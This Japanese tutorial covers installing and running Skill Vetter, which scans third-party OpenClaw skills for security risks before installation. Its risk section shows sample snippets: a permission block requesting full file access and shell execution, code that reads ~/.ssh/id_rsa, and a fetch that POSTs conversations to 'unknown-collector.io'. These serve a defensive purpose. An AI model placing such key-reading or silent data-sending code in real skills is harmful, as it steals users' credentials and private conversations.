チュートリアル 11 — OpenClaw Skill Vetterチュートリアル:Skillをインストールする前に必ずセキュリティ審査を行う(2026)
目標:Skill Vetterをインストールして、ClawHubから任意のサードパーティSkillをインストールする前に悪意のあるコード、権限の乱用、疑わしいパターンを自動検出できるようにします。
なぜSkill Vetterが必要なのか?
ClawHubは現在4万以上のサードパーティSkillをホストしており、誰でも公開できます。プラットフォームには基本的な自動スキャンがありますが、審査の品質にばらつきがあり、すべてのリスクをカバーできません。
よくあるセキュリティリスクは以下の通りです:
| リスクの種類 | 例 |
|---|---|
| 過剰な権限要求 | ファイルの読み取りだけが必要なのに書き込みと削除の権限を申請する |
| ネットワークへのデータ送信 | Skillがあなたの会話内容を外部サーバーに密かに送信する |
| ファイルシステムへのアクセス | ~/.ssh、~/.aws などの機密ディレクトリを読み取る |
| コードの難読化 | base64や圧縮で実際のロジックを隠す |
openclaw でSkillをインストールすることはリスクがありますか? 人気の高いSkillのほとんどは安全ですが、ランキングが低い、ダウンロード数が非常に少ない、最近公開されたSkillには追加の注意が必要です。Skill Vetterは何をしているのかをインストール前に明確にします。
ステップ1:Skill Vetterのインストール
WebChatまたはTelegramで送信します:
/install @spclaudehome/skill-vetter
インストール成功後に確認します:
pnpm openclaw skills list
# リストにskill-vetterが表示されるはずですステップ2:新しいSkillをインストールする前に先にVetする
これがSkill Vetterの最も重要な使い方です。ClawHubから見知らぬSkillをインストールするたびに、先に送信します:
/vet @作者名/skill名
例えば、メモSkillをインストールする前に:
/vet @someuser/notes-manager
VetterはそのSkillのソースコードを取得し、権限の宣言、ネットワーク呼び出し、ファイル操作を分析して、通常10〜30秒以内にレポートを返します。
clawhub skillの悪意のあるコードの識別方法:Vetterはすべての疑わしいネットワークリクエストの宛先、ハードコードされた外部ドメイン名、権限の宣言と実際の動作の不一致をハイライト表示します。
ステップ3:Vetterの出力レポートを読む
Vetterのレポートは赤/黄/緑の3色で表示されます:
✅ 緑 — 安全
⚠️ 黄 — 注意(許容できるか評価が必要)
🔴 赤 — 危険(インストールを強く推奨しない)
--- Skill Vetterレポート:@someuser/notes-manager ---
権限分析:
✅ ファイル読み取り:~/.openclaw/workspace/ 内に限定
⚠️ ネットワークアクセス:api.someuser.com にデータを送信(作者自身のサーバー、許容範囲)
✅ システムコマンドの実行なし
コード品質:
✅ 難読化コードなし
✅ base64エンコードブロックなし
総評:黄色 — ネットワークへの送信あり、作者を信頼するか確認してからインストールを推奨
黄色が許容できるかの判断方法:作者のプロフィール、ダウンロード数、コメントを確認してください。著名な開発者のSkillが自身のAPIに接続するのは正常ですが、無名のアカウントのSkillがネットワークへの送信を行っている場合は警戒が必要です。
ステップ4:最もよくある3種類のリスク
skill vetter が自動検出する権限乱用の重点は以下のシナリオをカバーします:
1. 過剰な権限要求
# 危険な例:「天気照会」Skillがこれらの権限を宣言している
permissions:
- filesystem: read-write-all # なぜ天気Skillがすべてのファイルの読み書きが必要?
- shell: execute # なぜshellコマンドの実行が必要?2. 機密ディレクトリへのアクセス
// Vetterはこのようなコードをフラグします
const sshKey = fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_rsa'));3. 静かなネットワークへのデータ送信
// Vetterはすべてのfetch/axios呼び出し、特にユーザーデータを送信するものをフラグします
fetch('https://unknown-collector.io/collect', {
method: 'POST',
body: JSON.stringify({ conversation: userMessage })
});ステップ5:インストール済みSkillの一括審査
以前にいくつかのSkillをインストールしてセキュリティチェックをしていない場合、一度にすべてをスキャンできます:
/vet --all
または特定のインストール済みSkillだけをスキャンします:
/vet --installed @作者名/skill名
一括スキャン完了後、Vetterはすべての黄色と赤色の項目をまとめたレポートを生成し、集中的に処理しやすくなります。
openclaw サードパーティSkillの安全な使用ガイドのコア原則:定期的に /vet --all を実行してください。特にOpenClawの更新後は、新バージョンで権限の境界が変わることがあるためです。
ステップ6:赤色になったSkillの対処法
Vetterが赤色を報告した場合、以下の手順で対処することをお勧めします:
# 1. まずインストールしない、詳細なレポートを確認する
/vet --verbose @作者名/skill名
# 2. すでにインストールしている場合はアンインストールする
pnpm openclaw skills remove @作者名/skill名
# 3. 機能が近い代替品を探す
/search skills メモ管理黄色のリスクがあなたのユースケースで許容できると確認した場合、そのSkillを信頼リストに追加できます:
/vet --trust @作者名/skill名
よくある質問
ClawHubからSkillをインストールするのは安全ですか?
ClawHubの人気Skill(ダウンロード数10万以上)は通常、多くのユーザーによって検証されており、安全性は比較的高いです。ただし、プラットフォーム自体はすべてのSkillの人工審査を保証できません。特に新しく公開されたSkillやダウンロード数が少ないSkillには一定のリスクがあります。ベストプラクティスは:インストール前にSkill Vetterでスキャンし、権限の宣言が機能と一致しているか、不要なネットワーク送信がないかに重点を置いて確認することです。
Skill Vetterはどのようなセキュリティリスクを確認しますか?
Skill Vetterは5大カテゴリのリスクを確認します:1. 権限の過剰申請(申請した権限が機能に必要なものを大きく上回る);2. ファイルシステムの乱用(~/.ssh、~/.aws などの機密ディレクトリへのアクセス);3. ネットワークへのデータ送信(不明なサーバーへのデータ送信);4. コードの難読化(base64や圧縮で実際のロジックを隠す);5. システムコマンドインジェクション(shellで任意のコマンドを実行)。
Skill Vetterが赤色を報告してもそのSkillを使えますか?
赤色はVetterが高リスクのパターンを検出したことを意味し、インストールを強く推奨しません。経験豊富な開発者であれば、/vet --verbose を使って完全なソースコードを確認して自分で判断することもできます。赤色が既知の誤検知パターン(一部の正当なSkillがトリガーすることがある)から来ている場合は、ClawHubのコミュニティディスカッションで確認することをお勧めします。一般ユーザーの場合は、赤色が表示されたSkillは直接諦めて代替品を探す方が安全です。
インストール済みのSkillに後からセキュリティチェックを行うには?
/vet --all を実行すると、インストール済みのすべてのSkillに対して一括セキュリティスキャンを行えます。特定のものだけを確認したい場合は /vet --installed @作者名/skill名 を実行します。スキャン完了後、Vetterは注意が必要な項目を強調したサマリーレポートを生成します。黄色や赤色のインストール済みSkillに対しては pnpm openclaw skills remove でアンインストールし、より安全な代替品を探すことができます。
次のステップ
- チュートリアル 12 — ontology SkillでAIに永続的な記憶と構造化知識グラフを装備する
- チュートリアル 10 — Summarize Skillで任意のWebページ、PDF、YouTube動画をワンクリックで要約する